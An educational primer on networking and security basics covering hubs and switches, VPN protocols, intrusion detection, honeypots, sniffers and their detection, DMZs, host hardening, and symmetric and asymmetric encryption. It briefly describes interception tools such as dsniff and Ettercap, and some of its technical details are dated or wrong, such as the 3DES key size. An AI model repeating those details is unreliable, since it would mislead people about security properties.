The following picture shows a Cisco 2800 Series Router.


What is a Hub?
Hubs were the common network infrastructure devices used for LAN connectivity but switches are rapidly
replacing hubs. Hubs function as the central connection point for LANs. Hubs are designed to work with
Twisted pair cabling and normally use RJ45 jack to connect the devices. Network devices (Servers,
Workstations, Printers, Scanners etc) are attached to the hub by individual network cables. Hubs usually come
in different shapes and different numbers of ports.

When a hub receives a packet of data (an Ethernet frame) at one of its ports from a network device, it transmits
(repeats) the packet to all of its ports to all of the other network devices. If two network devices on the same
network try to send packets at the same time a collision is said to occur.

Hubs operate in such a way that all data received through one port is sent to all other ports. This type of
operation creates an extremely unsecure environment and anyone can sniff the network using a sniffer and any
unencrypted traffic over the network is not secure. Hubs are unsecure LAN devices that should be replaced
with switches for security and increased bandwidth.

Hubs are considered to operate at Physical Layer (Layer 1) of OSI model. An 8 port hub is shown below.
What are bridges and switches?
A bridge is a network device that operates at the Data Link layer (Layer 2) of OSI model. There
are many different types of bridges and include Transparent bridges, Encapsulation bridges,
Source-route bridges. Source-route bridges are for Token Ring network. Bridges allow segmenting
a Local Network into multiple segments, thus reducing the network traffic. A bridge performs the
segmenting function by examining the Data Link Layer (Layer 2) data packet (Ethernet Frame)
and forwarding the packet to other physical segments only if necessary. Both swiches and bridges
function using Data Link Layer (Layer 2) addressing system, also known as MAC addresses.

Bridge can connect only two Networks, LANs or Hosts, which means that bridge has only two
ports. While Switch can connect more than two networks or LANs or Hosts because normally
switch has more than two ports (usually 24 ports or 48 ports). Simply you can say that a Bridge
with more than two ports is known as a Switch. Brides and Switches are considered to operate at
Data Link Layer (Layer 2) of OSI model.

The following picture shows a 24 port, 10/100, Cisco 2500 Catalist Switch.

Remote Access Services (RAS), What is Remote Access


Services (RAS)
Remote Access Services (RAS) refers to any combination of hardware and software which allows
you to connect from your computer at home or a remote location to your corporate network and
work as if you are connected directly to the corporete network.

Corporate users can connect to the corporate network using direct Dial-up network or
through Virtual Private Network (VPN), where a low cost intermediate network (such as the
Internet) to connect to the corporate network. Microsoft Routing and Remote Access Services is
an example for Remote Access Services (RAS).

Dial-up networking is a Remote Access connection when a remote access client makes a
nonpermanent, dial-up connection to a physical port on a Remote Access server by using the
service of a third party telecom service provider using analog phone or ISDNconnection.

Virtual Private Networking (VPN) is a logical, indirect connection between the Virtual Private
Networking (VPN) client and the Virtual Private Networking (VPN) server over a low cost public
network such as the Internet. A Virtual Private Networking (VPN) client uses Virtual Private
Networking (VPN) protocols called tunneling protocols to make a virtual call to a virtual port on
a Virtual Private Networking (VPN) server.

Virtual Private Networks (VPNs), What is Virtual Private


Networks (VPNs)
A Virtual Private Network (VPN) can be viewed as a private network which is connected through
a public network. Virtual Private Networks (VPNs) are used to connect LANs together across the
Internet. Using Virtual Private Network (VPN) technologies, remote users can connect to
enterprise network securely over the public internet as if their computers are physically connected
to the network.

Virtual Private Network (VPN) connections use either Point-to-Point Tunneling Protocol (PPTP)
or Layer Two Tunneling Protocol/Internet Protocol security (L2TP/IPSec) over internet. Internet
connections are usually cheaper than leased line, Dial-up, ISDN or similar type of connections.
Since Internet is the connection medium, Virtual Private Network (VPN) can save huge telecom
costs.

Point-to-Point Tunneling Protocol (PPTP)

PPTP was created by Microsoft and available since Windows NT 4.0 Routing and Remote Access
Services. Point-to-Point Tunneling Protocol (PPTP) encrypts the data it encapsulates, but the
header is not encrypted. Since the VPN header is not encrypted, an eavesdropper can read the VPN
header but the data is somewhat secure since the contents are encrypted.

Layer 2 Tunneling Protocol (L2TP)

Layer 2 Tunneling Protocol (L2TP) is another VPN tunneling protocol which is used together
with Internet Protocol Security (IPSec). IPSec encrypts the entire L2TP packet. A advantage of
L2TP over PPTP is that eavesdroppers cannot identify that a VPN is in use, because IPSec encrypts
the L2TP header information also. Hence L2TP/IPSec protocol is much more secure than Point-
to-Point Tunneling Protocol (PPTP).
Intrusion Detection Systems (IDS), Network Intrusion
Detection System (NIDS), Host Intrusion Detection System
(HIDS), Signatures, Alerts, Logs, False Alarms. Sensor
Intrusion detection is a set of techniques and methods that are used to detect suspicious activity
both at the network and host level. Intrusion detection is the act of detecting a hostile user or
intruder who is attempting to gain unauthorized access or trying to disturb the services or deny
the services to legitimate users. An Intrusion Detection System (IDS) is software or a device or
a combination of both that monitors and track network intrusion attempts, malicious activities
or policy violations and produces reports for the security administrators.

Basically an Intrusion Detection System (IDS) is also a sniffer. An Intrusion Detection System
(IDS) detect an intrusion by sniffing and analyzing the network packets.

The most popular Open Source Intrusion Detection System (IDS) is Snort, developed
by SourceFire. Snort can detect thousands of worms, vulnerability exploit attempts, port scans,
and other suspicious activities. Snort is available for both Linux and Windows platforms as
source files and binaries. Click the following link to download Snort.

Following are some definitions which are related with Intrusion Detection System (IDS).

Intrusion Detection System (IDS)

Intrusion Detection System (IDS) is software, or a device or combination of both used to detect
intruder activity.

Network Intrusion Detection System (NIDS)

Network Intrusion detection systems (NIDS) usually consists of a network appliance (or sensor)
with a Network Interface Card (NIC) operating in promiscuous mode and a separate management
interface. The IDS is placed along a network segment or boundary and monitors all traffic on
that segment. Depending upon whether a packet is matched with an intruder signature, an alert
is generated or the packet is logged to a file or database.

Host Intrusion Detection System (HIDS)

A Host Intrusion detection systems (HIDS) and software applications (agents) installed on
workstations which are to be monitored. The agents monitor the operating system and write data
to log files and/or trigger alarms. A Host Intrusion detection systems (HIDS) can only monitor
the individual workstations on which the agents are installed and it cannot monitor the entire
network.
Signatures

Signature is the pattern that you look for inside a data packet. Each attack has its own specific
signatures and a signature is used to detect one or multiple types of attacks. Signatures can be
identified from IP header, transport layer protocol header (TCP or UDP header) or from data.

Alerts

Alerts are any sort of user notification of an intruder activity. When an IDS detects an intruder,
it has to inform security administrator about this using alerts.

Logs

The log messages are usually saved in file for future analysis.

False Alarms

False alarms are alerts generated due to an indication that is not an intruder activity.

Sensor

The machine on which an intrusion detection system is running is also called the sensor in the
literature because it is used to "sense" the network.

A firewall is a hardware and/or software which functions in a networked environment to block


unauthorized access while permitting authorized communications. Firewall is a device and/or a
software that stands between a local network and the Internet, and filters traffic that might be
harmful.

An Intrusion Detection System (IDS) is a software or hardware device installed on the network
(NIDS) or host (HIDS) to detect and report intrusion attempts to the network.

We can think a firewall as security personnel at the gate and an IDS device is a security camera
after the gate. A firewall can block connection, while a Intrusion Detection System (IDS)
cannot block connection. An Intrusion Detection System (IDS) alert any intrusion attempts to
the security administrator.

However an Intrusion Detection and Prevention System (IDPS) can block connections if it
finds the connections is an intrusion attempt.
Types of Intrusion Detection Systems (IDS)

Intrusion detection systems (IDS) can be classified into different ways. The major classifications are Active
and passive IDS, Network Intrusion detection systems (NIDS) and host Intrusion detection systems (HIDS)
Active and passive IDS
An active Intrusion Detection Systems (IDS) is also known as Intrusion Detection and
Prevention System (IDPS). Intrusion Detection and Prevention System (IDPS) is configured to
automatically block suspected attacks without any intervention required by an operator. Intrusion
Detection and Prevention System (IDPS) has the advantage of providing real-time corrective
action in response to an attack.

A passive IDS is a system that’s configured to only monitor and analyze network traffic activity
and alert an operator to potential vulnerabilities and attacks. A passive IDS is not capable of
performing any protective or corrective functions on its own.

Network Intrusion detection systems (NIDS) and Host Intrusion detection systems (HIDS)

Network Intrusion Detection Systems (NIDS) usually consists of a network appliance (or sensor)
with a Network Interface Card (NIC) operating in promiscuous mode and a separate management
interface. The IDS is placed along a network segment or boundary and monitors all traffic on
that segment.

A Host Intrusion Detection Systems (HIDS) and software applications (agents) installed on
workstations which are to be monitored. The agents monitor the operating system and write data
to log files and/or trigger alarms. A host Intrusion detection systems (HIDS) can only monitor
the individual workstations on which the agents are installed and it cannot monitor the entire
network. Host based IDS systems are used to monitor any intrusion attempts on critical servers.

The drawbacks of Host Intrusion Detection Systems (HIDS) are

• Difficult to analyse the intrusion attempts on multiple computers.

• Host Intrusion Detection Systems (HIDS) can be very difficult to maintain in large networks
with different operating systems and configurations

• Host Intrusion Detection Systems (HIDS) can be disabled by attackers after the system is
compromised.

Knowledge-based (Signature-based) IDS and behavior-based (Anomaly-based) IDS

A knowledge-based (Signature-based) Intrusion Detection Systems (IDS) references a database


of previous attack signatures and known system vulnerabilities. The meaning of word signature,
when we talk about Intrusion Detection Systems (IDS) is recorded evidence of an intrusion or
attack. Each intrusion leaves a footprint behind (e.g., nature of data packets, failed attempt to run
an application, failed logins, file and folder access etc.). These footprints are called signatures
and can be used to identify and prevent the same attacks in the future. Based on these signatures
Knowledge-based (Signature-based) IDS identify intrusion attempts.
The disadvantages of Signature-based Intrusion Detection Systems (IDS) are signature database
must be continually updated and maintained and Signature-based Intrusion Detection Systems
(IDS) may fail to identify a unique attacks.

A Behavior-based (Anomaly-based) Intrusion Detection Systems (IDS) references a baseline or


learned pattern of normal system activity to identify active intrusion attempts. Deviations from
this baseline or pattern cause an alarm to be triggered.

Higher false alarms are often related with Behavior-based Intrusion Detection Systems (IDS).

Leading Intrusion Detection Systems (IDS) Products


Some leading Intrusion Detection Systems (IDS) Products are

• Snort

Snort® is an open source network intrusion prevention and detection system (IDS/IPS) developed
by Sourcefire. Combining the benefits of signature, protocol and anomaly-based inspection, Snort
is the most widely deployed IDS/IPS technology worldwide. With millions of downloads and
approximately 300,000 registered users, Snort has become the de facto standard for IPS.

• CounterAct

CounterACT Edge security appliance delivers an entirely unique approach to preventing network
intrusions: Stop attackers based on their "proven intent" to attack without using signatures,
anomaly detection or pattern matching of any kind.

Attackers follow a consistent pattern. To launch an attack, they need knowledge about a network's
resources. Potential intruders, whether humans or self-propagating threats, compile vulnerability
and configuration information through scanning and probing prior to an attack. The information
received is then used to launch attacks based on the unique structure and characteristics of the
targeted network.

• AirMagnet

AirMagnet Enterprise provides a simple, scalable WLAN monitoring solution that enables any
organization to proactively mitigate all types of wireless threats, enforce enterprise policies,
prevent performance problems and audit the regulatory compliance of all their WiFi assets and
users worldwide.

• Bro Intrusion Detection System

Bro is an open-source, Unix-based Network Intrusion Detection System (NIDS) that passively
monitors network traffic and looks for suspicious activity. Bro detects intrusions by first parsing
network traffic to extract its application-level semantics and then executing event-oriented
analyzers that compare the activity with patterns deemed troublesome. Its analysis includes
detection of specific attacks (including those defined by signatures, but also those defined in terms
of events) and unusual activities (e.g., certain hosts connecting to certain services, or patterns of
failed connection attempts).

• Cisco Intrusion Prevention System (IPS)

Cisco IPS is one of the most widely deployed intrusion prevention systems, providing:

Protection against more than 30,000 known threats, Timely signature updates and Cisco Global
Correlation to dynamically recognize, evaluate, and stop emerging Internet threats
Cisco IPS includes industry-leading research and the expertise of Cisco Security Intelligence
Operations.

Cisco IPS protects against increasingly sophisticated attacks, including Directed attacks, Worms,
Botnets, Malware, Application abuse.

Cisco IPS also helps your organization comply with government regulations and consumer privacy
laws. It provides intrusion prevention that Stops outbreaks at the network level, before they reach
the desktop, Prevents losses from disruptions, theft, or defacement, Collaborates with other
network components, for end-to-end, networkwide intrusion prevention, Supports a wide range of
deployment options, with near-real-time updates for the most recent threat, Decreases legal
liability, protects brand reputation, and safeguards intellectual property.

• Juniper Networks Intrusion Detection & Prevention (IDP)

Juniper Networks IDP Series Intrusion Detection and Prevention Appliances with Multi-Method
Detection (MMD), offers comprehensive coverage by leveraging multiple detection mechanisms.
For example, by utilizing signatures, as well as other detection methods including protocol
anomaly traffic anomaly detection, the Juniper Networks IDP Series appliances can thwart known
attacks as well as possible future variations of the attack. Backed by Juniper Networks Security
Lab, signatures for detection of new attacks are generated on a daily basis. Working very closely
with many software vendors to assess new vulnerabilities, it’s not uncommon for IDP Series to be
equipped to thwart attacks which have not yet occurred. Such day-zero coverage ensures that
you’re not merely reacting to new attacks, but proactively securing your network from future
attacks.

• McAfee Host Intrusion Prevention for server

Defend your servers from known and new zero-day attacks with McAfee Host Intrusion
Prevention. Boost security, lower costs by reducing the frequency and urgency of patching, and
simplify compliance.

• Sourcefire Intrusion Prevention System (IPS)


Built on the foundation of the award-winning Snort® rules-based detection engine, Sourcefire
IPS™ (Intrusion Prevention System) uses a powerful combination of vulnerability- and anomaly-
based inspection methods—at throughputs up to 10 Gbps—to analyze network traffic and prevent
critical threats from damaging your network. Whether deployed at the perimeter, in the DMZ, in
the core, or at critical network segments, and whether placed in inline or passive mode,
Sourcefire’s easy-to-use IPS appliances provide comprehensive threat protection.

• Strata Guard IDS/IPS

The award-winning Strata Guard® high-speed intrusion detection/prevention system (IDS/IPS)


gives you real-time, zero-day protection from network attacks and malicious traffic, preventing
Malware, spyware, port scans, viruses, and DoS and DDoS from compromising hosts, Device and
network outages, Data leakage, High-risk protocols, such as BitTorrent™, Kazaa™, and TelNet,
from running on your network, Unauthorized access to sensitive data.

Introduction to Honeypots
A honeypot is a closely monitored computing resource that we want to be probed, intruded,
attacked, or compromised. A honeypot is defined as "an information system resource whose value
lies in unauthorized or illicit use of that resource". A honeypot can capture every action an intruder
or attacker makes inside the honeypot. A honeypot can log access attempts, can capture keystrokes,
can identify the files accessed and modified, can identify the programs executed within honeypot.
If an attacker is unaware that he’s inside a honeypot, we can even identify his ultimate intentions.

Honeypots can be placed inside the network, outside the network or inside DMZ (Demilitarized
Zone). They can even be placed in all of the above locations.

Honeypots are necessary to learn how intruders and attackers probe and attempt to gain access to
your systems. By learning and recording how intruders and attackers probe and attempt to gain
access to the systems, we can gain insight into attack methodologies to protect our real production
systems.

Honeypots are also necessary to record and provide forensic information of an attack to
government law enforcement agencies. These records generated by the honeypots are required to
prosecute the intruders and attackers.

Network protocol analysis


(Also known as network monitoring, network traffic analysis, protocol analysis, sniffing, packet
analysis, eavesdropping etc) is the process of capturing network traffic passing through the wire
and inspecting it to troubleshoot the network problems. A network protocol analyzer decodes the
data packets of network protocols and displays the network traffic in readable format. A network
protocol analyzer has many uses. Some of them are

• Troubleshooting network problems.


• Analyzing the performance of a network.

• Network intrusion detection and detection of worms, viruses, compromised computers and
other types of network attacks.

• Logging network traffic for forensics and evidence.

• Analyzing the operations of applications.

Sniffers are dangerous to network security because they can catch the network traffic and read
unencrypted data from network which makes them a favorite weapon of network intruders.
Network intruders use sniffing to capture confidential information (unencrypted) over the
network. Network intruders can use sniffers for capturing usernames and passwords which are
sent unencrypted, mapping the usage patterns of the users on a network, Capturing VoIP
telephone conversations, Mapping the network etc.
Note: The term "Sniffer" was a registered trade mark of Network General. Network General later
merged with NetScout Systems Inc.

First network protocol analyzer (Sniffer) switches the selected network interface into
promiscuous mode. In promiscuous mode the network card can listen for all network traffic on
its particular network segment. The network protocol analyzer (Sniffer) uses this mode along
with low-level access to the interface to capture the raw binary data from the wire. The captured
binary data is then converted into a readable format. After it is converted in to readable format
it is then analyzed based on the protocol.

The network protocol analyzer (Sniffer) can analyze large number of network protocols
including ARP, IP, ICMP, TCP, UDP, DCCP, HTTP, FTP, DNS, and DHCP.

Some leading Network Protocol Analyzer (Sniffer)


products are
• Wireshark Network Protocol Analyzer
Wireshark is the world's foremost network protocol analyzer, and is the de facto (and often de
jure) standard across many industries and educational institutions.
• tcpdump
tcpdump is a common packet analyzer that runs under the command line. It allows the user to
intercept and display TCP/IP and other packets being transmitted or received over a network to
which the computer is attached. Distributed under the BSD license,[1] tcpdump is free
software.
• WinDump: tcpdump for Windows
WinDump is the Windows version of tcpdump, the command line network analyzer for UNIX.
WinDump is fully compatible with tcpdump and can be used to watch, diagnose and save to
disk network traffic according to various complex rules.
• OmniPeek Network Analyzer
OmniPeek is a commercial Network Protocol Analyzer (Sniffer). OmniPeek gives network
engineers real-time visibility and Expert Analysis into every part of the network from a single
interface, including Ethernet, Gigabit, 10 Gigabit, 802.11a/b/g/n wireless, VoIP, and Video to
remote offices. Using OmniPeek’s intuitive user interface and "top-down" approach to
visualizing network conditions, network engineers—even junior staff—can quickly analyze,
drill down and fix performance bottlenecks across multiple network segments, maximizing
uptime and user satisfaction.
• Windows Network Monitor
Windows Network Monitor is a built-in Network Protocol Analyzer (Sniffer) product for
Windows Server Operating Systems.
• dsniff
dsniff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf,
mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data
(passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of
network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and
webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS
sessions by exploiting weak bindings in ad-hoc PKI.
• Ettercap
Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live
connections, content filtering on the fly and many other interesting tricks. It supports active
and passive dissection of many protocols (even ciphered ones) and includes many feature for
network and host analysis.
• ntop
ntop is a network traffic probe that shows the network usage, similar to what the popular top
Unix command does. ntop is based on libpcap and it has been written in a portable way in
order to virtually run on every Unix platform and on Win32 as well. ntop users can use a a web
browser (e.g. netscape) to navigate through ntop (that acts as a web server) traffic information
and get a dump of the network status. In the latter case, ntop can be seen as a simple RMON-
like agent with an embedded web interface.
• EtherApe
EtherApe is a graphical network monitor for Unix modeled after etherman. Featuring link
layer, ip and TCP modes, it displays network activity graphically. Hosts and links change in
size with traffic. Color coded protocols display. It supports Ethernet, FDDI, Token Ring,
ISDN, PPP and SLIP devices. It can filter traffic to be shown, and can read traffic from a file
as well as live from the network.
• Kismet
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.
Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and
(with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet
also supports plugins which allow sniffing other media such as DECT. Kismet identifies
networks by passively collecting packets and detecting standard named networks, detecting
(and given time, decloaking) hidden networks, and infering the presence of nonbeaconing
networks via data traffic.

As discussed in previous lesson, Sniffers are dangerous to network security because they can catch
the network traffic and read unencrypted data from network which makes them a favorite weapon
of network intruders. Sniffers do not transmit any information, and sniffers collect network data
packets passivly. Hence it is difficult to detect Sniffers in network. The following methods can be
used to detect sniffers.

Detecting Promiscuous Mode

A sniffer can run in one of two modes: Non-promiscuous mode and Promiscuous mode. Sniffers
operate in non-promiscuous mode can collect data from the network that is addressed to or sent
from the computer that is running the sniffer. Promiscuous mode allows a network adapter to
collect all the network traffic data that passsing over the network, regardless of the destination
address. Promiscuous mode enables Sniffers to capture all network traffic. To detect Promiscuous
mode in a UNIX type operating system, use the command "ifconfig -a" (without quotes). Search
for the PROMISC flag in the output.

[root@Fed13 /]# ifconfig -a


eth0 Link encap:Ethernet HWaddr 00:0C:29:10:8A:DC
inet6 addr: fe80::20c:29ff:fe10:8adc/64 Scope:Link
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:468 (468.0 b)
Interrupt:18 Base address:0x2000

lo Link encap:Local Loopback


inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:104 errors:0 dropped:0 overruns:0 frame:0
TX packets:104 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:13880 (13.5 KiB) TX bytes:13880 (13.5 KiB)

Other command which can be used to detect is promiscuous mode in UNIX type operating
systems "ip link".

[root@Fed13 ~]# ip link


1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,PROMISC,UP,LOWER_UP> mtu 1500 qdisc
pfifo_fast state UNKNOWN qlen 1000
link/ether 00:0c:29:10:8a:dc brd ff:ff:ff:ff:ff:ff

To detect promiscuous mode in Windows Operating Systems, the free tool Promqry can be
used. Promqry is available for download from Microsoft web site.

Address Resolution Protocol (ARP) Method

Address Resolution Protocol (ARP) is used to resolve IP addresses to MAC addresses. A computer
caches resolved addresses for future use. Here we send a non-broadcast ARP. A machine in
promiscuous mode will cache your ARP address. Next we send a broadcast ping packet with our
IP, but a different MAC address. Only the machine which has our correct MAC address from the
previous sniffed ARP frame will be able to respond to broadcast ping request.

Latency Method

In Latency Method, huge amount of data is sent on the network and the suspect machine is pinged
before and after flooding. If sniffer is running on the machine it will be in promiscuous mode and
it may need to parse the data thus increasing the load on it. Because of the load, it will take extra
time to respond to the ping request. This latency may indicate a sniffer running in the target
machine.

Monitoring the Hosts

In a busy network, capturing and analyzing huge network data may cause the CPU work load to
increase. Large disk space is also required to save the captured network data. Increased CPU work
load and disk usage without any reason may indicate a sniffer running in that machine.

DMZ (Demilitarized Zone), DMZ Servers, What is Bastion


Host
DMZ is an abbreviation for Demilitarized Zone. DMZ (Demilitarized Zone) refers to a part of
the network that is neither part of the internal network nor directly part of the Internet. Normally,
DMZ (Demilitarized Zone) is the area between your Internet access router and your bastion host
(A bastion host is computer on a network which is configured to withstand attacks).

DMZ (Demilitarized Zone) is also known as Perimeter Network. DMZ (Demilitarized Zone) add
an additional layer of security to an organization's internal network and an external attacker has
only has access to network devices and servers in the DMZ (Demilitarized Zone). By creating a
DMZ (Demilitarized Zone) an outside user need to make at least one hop in the DMZ
(Demilitarized Zone) before he can access sensitive information inside the trusted network.

DMZ (Demilitarized Zone) normally hold Web servers, FTP servers, Name servers (DNS), E-
mail Servers, Honeypots.

How to secure Workstations and Servers


Workstations are normally operated by end users with limited computer knowledge and hence they
require much attention. Workstations communicate with other workstations and servers using
services such as file sharing, network services, and other applications programs.

Following tips are helpful for securing workstations and servers.

• Select an operating system which is more secure and has less vulnerability. Download and install
hot fixes, Service Packs and updates without delay.

• Install a trusted and good antivirus and update it regularly.

• Install a good anti-spyware and update it regularly.

• Install Host Intrusion Detection System (HIDS) software such as ossec, tripwire or rkhunter.

• Install good firewall and configure it properly for workstations and servers. Close all ports which
are not required.

• Enforce strong password policy to users, which may protect against brute force and dictionary
attacks.

• Select a web browser which is more stable and secure, because attacks can be launched using
browsers. If possible disable scripts execution.

• Download and install software’s from trusted site only. Try to install digitally signed software’s
and view the digital certificate to check whether the certificate is OK.

• Close all services and protocols and run only the services and protocols which are necessary.
Many services have known vulnerabilities and the attacker may exploit these vulnerabilities to
gain access to your workstation or server.

• Remove all shares that are not necessary.

• Attackers can launch attacks targeted at specific Operating System and services once the
Operating System and server application is identified. Example: By default, many web server
applications show information regarding the web server application name, web server application
version, Operating System and Operating System version in error messages. This may help an
attacker to exploit vulnerabilities of the web server application and Operating System. Web server
application should be configured to hide this information.

• If possible, try to change default administrative account names and passwords for Operating
Systems, Databases and other sensitive applications and services.

• Conduct a penetration test to check your workstations and servers.

• Keep all the sensitive data encrypted.


• Physical security is an important factor and if there is no physical security all the above tips are
of NO use.

What is Symmetric Encryption?


You will learn the terms encryption, encryption algorithm encryption key and symmetric
encryption in this lesson.

Cryptography is the art and science of making data impossible to read. Cryptographic algorithms
start with plain, readable data (plaintext) and scramble it so it becomes an unreadable ciphertext.
Each encryption algorithm must also specify how the ciphertext can be decrypted back into the
plaintext it came from, so that the intended recipient can read it.

Encrypting the plaintext to ciphertext will give high security to your confidential data and only
the authorized person who is supposed to read this document, can read it.

Encryption Terms

Following are some important terms related with encryption. Before continuing, you should
know what these terms are.

Plaintext: The information in its original form. This is also known as cleartext.

Ciphertext: The information after it has been obfuscated by the encryption algorithm.

Encryption: The process of changing the plaintext into ciphertext.

Decryption: The process of changing the ciphertext into plaintext.

Encryption Algorithm: An algorithm defines how data is transformed when original plaintext
data scrambled to ciphertext. Both the data sender and the recipient must know the algorithm
used for data transformation. The recipient should use the same algorithm to decrypt the
ciphertext back into the original plaintext data.

Encryption Key: A key is secret value, which is used as an input to the algorithm along with the
plaintext data when plaintext is converted to ciphertext. The same secret key should be used to
decrypt the ciphertext back into plaintext data.

Cryptography: The art of concealing information using encryption.


Cryptographer: An individual who practices cryptography.

Cryptanalysis: The art of analyzing cryptographic algorithms for identifying the weaknesses.

Cryptanalyst: An individual who uses cryptanalysis to identify the weaknesses in cryptographic


algorithms.

What is Symmetric Encryption?

Symmetric encryption is the process of converting readable data unreadable format and
converting it back to readable format using same key. Symmetric encryption algorithms use the
same key for encryption and decryption. The key must be exchanged so that both the data sender
and the data recipient can access the plaintext data. The plaintext (Readable Text) is converted
to ciphertext (unreadable text) using a key and at the receiving side the same key is used to covert
back the ciphertext (unreadable text) to plaintext (Readable Text).

Symmetric Encryption Algorithms, DES, DESX, Triple


DES,3DES,RC2,RC5,RC4,AES,IDEA,Blowfish,CAST,Block
Cipher, Streaming Cipher
Data Encryption Standard (DES): An encryption algorithm that encrypts data with a 56-bit,
randomly generated symmetric key. DES is not a secure encryption algorithm and it was cracked
many times. Data Encryption Standard (DES) was developed by IBM and the U.S. Government
together. DES is a block encryption algorithm.

Data Encryption Standard XORed (DESX): DESX is a stronger variation of the DES encryption
algorithm. In DESX, the input plaintext is bitwise XORed with 64 bits of additional key material
before encryption with DES and the output is also bitwise XORed with another 64 bits of key
material.

Triple DES (3DES): Triple DES was developed from DES, uses a 64-bit key consisting of 56
effective key bits and 8 parity bits. In 3DES, DES encryption is applied three times to the plaintext.
The plaintext is encrypted with key A, decrypted with key B, and encrypted again with key C.
3DES is a block encryption algorithm.

RC2 and RC5: Ronald Rivest (RSA Labs), developed these algorithms. They are block encryption
algorithms with variable block and key sizes. It is difficult to break if the attacker does not know
the original sizes when attempting to decrypt captured data.

RC4: A variable key-size stream cipher with byte-oriented operations. The algorithm is based on
the use of a random permutation and is commonly used for the encryption of traffic to and from
secure Web sites using the SSL protocol.

Advanced Encryption Standard (AES): Advanced Encryption Standard (AES) is a newer and
stronger encryption standard, which uses the Rijndael (pronounced Rhine-doll) algorithm. This
algorithm was developed by Joan Daemen and Vincent Rijmen of Belgium. AES will eventually
displace DESX and 3DES. AES is capable to use 128-bit, 192-bit, and 256-bit keys.

International Data Encryption Algorithm (IDEA): IDEA encryption algorithm is the European
counterpart to the DES encryption algorithm. IDEA is a block cipher, designed by Dr. X. Lai and
Professor J. Massey. It operates on a 64-bit plaintext block and uses a 128-bit key. IDEA uses a
total of eight rounds in which it XOR’s, adds and multiplies four sub-blocks with each other, as
well as six 16-bit sub-blocks of key material.

Blowfish: Blowfish is a symmetric block cipher, designed by Bruce Schneier. Blowfish has a 64-
bit block size and a variable key length from 32 up to 448 bits. Bruce Schneier later created
Twofish, which performs a similar function on 128-bit blocks.

CAST: CAST is an algorithm developed by Carlisle Adams and Stafford Tavares. It’s used in
some products offered by Microsoft and IBM. CAST uses a 40-bit to 128-bit key, and it’s very
fast and efficient.

Note:

Block Cipher: A block cipher divides data into chunks, pads the last chunk if necessary, and then
encrypts each chunk in its turn.
Streaming Cipher. A streaming cipher uses a series of random numbers seeded with a cipher key
to encrypt a stream of bits.

What is Asymmetric Encryption? Private Key, Public Key

Asymmetric encryption increases the security of the encryption process by utilizing two separate
but mathematically related keys known as a public key and a private key. Asymmetric encryption
algorithms use a key mathematically related key pair for encryption and decryption. One key of
the key pair is is known as the public key and other one is private key.

The private key is possessed only by the user or computer that generates the key pair. The public
key can be distributed to any person who wishes to send encrypted data to the private key holder.
It is impossible to compute the private key if you know the public key. Hence it is safe to publish
the public key.

If the public key is used for encryption, the associated private key is used for decryption.

If the private key is used for encryption, the associated public key is used for decryption

First, the data sender obtains the recipient’s public key. The plaintext is encrypted with
asymmetric encryption algorithm, using the recipient’s public key and the ciphertext is created.
After the encryption process, the ciphertext is sent to the recipient through the unsecure network.
The recipient decrypts the ciphertext with his private key and now he can access the plaintext
from the sender.

Asymmetric Encryption Algorithms, Diffie-Hellman, RSA,


ECC, ElGamal, DSA
The following are the major asymmetric encryption algorithms used for encrypting or digitally
signing data.

Diffie-Hellman key agreement: Diffie-Hellman key agreement algorithm was developed by Dr.
Whitfield Diffie and Dr. Martin Hellman in 1976. Diffie-Hellman algorithm is not for
encryption or decryption but it enable two parties who are involved in communication to
generate a shared secret key for exchanging information confidentially. The working of Diffie-
Hellman key agreement can be explained as below.

Assume we have two parties who need to communicate securely.

1) P1 and P2 agree on two large integers a and b such that 1 < a < b.

2) P1 then chooses a random number i and computes I = a^i mod b. P1 sends I to P2.

3) P2 then chooses a random number j and computes J = a^j mod b. P2 sends J to P1.

4) P1 computes k1 = J^i mod b.

5) P2 computes k2 = I^j mod b.

6) We have k1 = k2 = a^(ij) mod b and thus k1 and k2 are the secret keys for secure
transmission.

Rivest Shamir Adleman (RSA): Ron Rivest, Adi Shamir, and Len Adleman released the
Rivest-Shamir-Adleman (RSA) public key algorithm in 1978. This algorithm can be used for
encrypting and signing data. The encryption and signing processes are performed through a
series of modular multiplications.

The basic RSA algorithm for confidentiality can be explained as below.

Ciphertext = (plaintext)^e mod n


Plaintext = (ciphertext)^d mod n
Private Key = {d, n}
Public Key = {e, n}

The basic RSA algorithm for authentication can be explained as below.

ciphertext = (plaintext)^d mod n


plaintext = (ciphertext)^e mod n
private key = {d, n}
public key = {e, n}

Elliptic Curve Cryptography (ECC): Elliptic Curve Cryptography (ECC) provides similar
functionality to RSA. Elliptic Curve Cryptography (ECC) is being implemented in smaller
devices like cell phones. It requires less computing power compared with RSA. ECC
encryption systems are based on the idea of using points on a curve to define the public/private
key pair.

El Gamal: El Gamal is an algorithm used for transmitting digital signatures and key exchanges.
The method is based on calculating logarithms. El Gamal algorithm is based on the
characteristics of logarithmic numbers and calculations. The Digital Signature Algorithm
(DSA) is based on El Gamal algorithm.

Digital Signature Algorithm (DSA). The Digital Signature Algorithm (DSA) was developed by
the United States government for digital signatures. Digital Signature Algorithm can be used
only for signing data and it cannot be used for encryption. The DSA signing process is
performed through a series of calculations based on a selected prime number. Although
intended to have a maximum key size of 1,024 bits, longer key sizes are now supported.

When DSA is used, the process of creating the digital signature is faster than validating it.

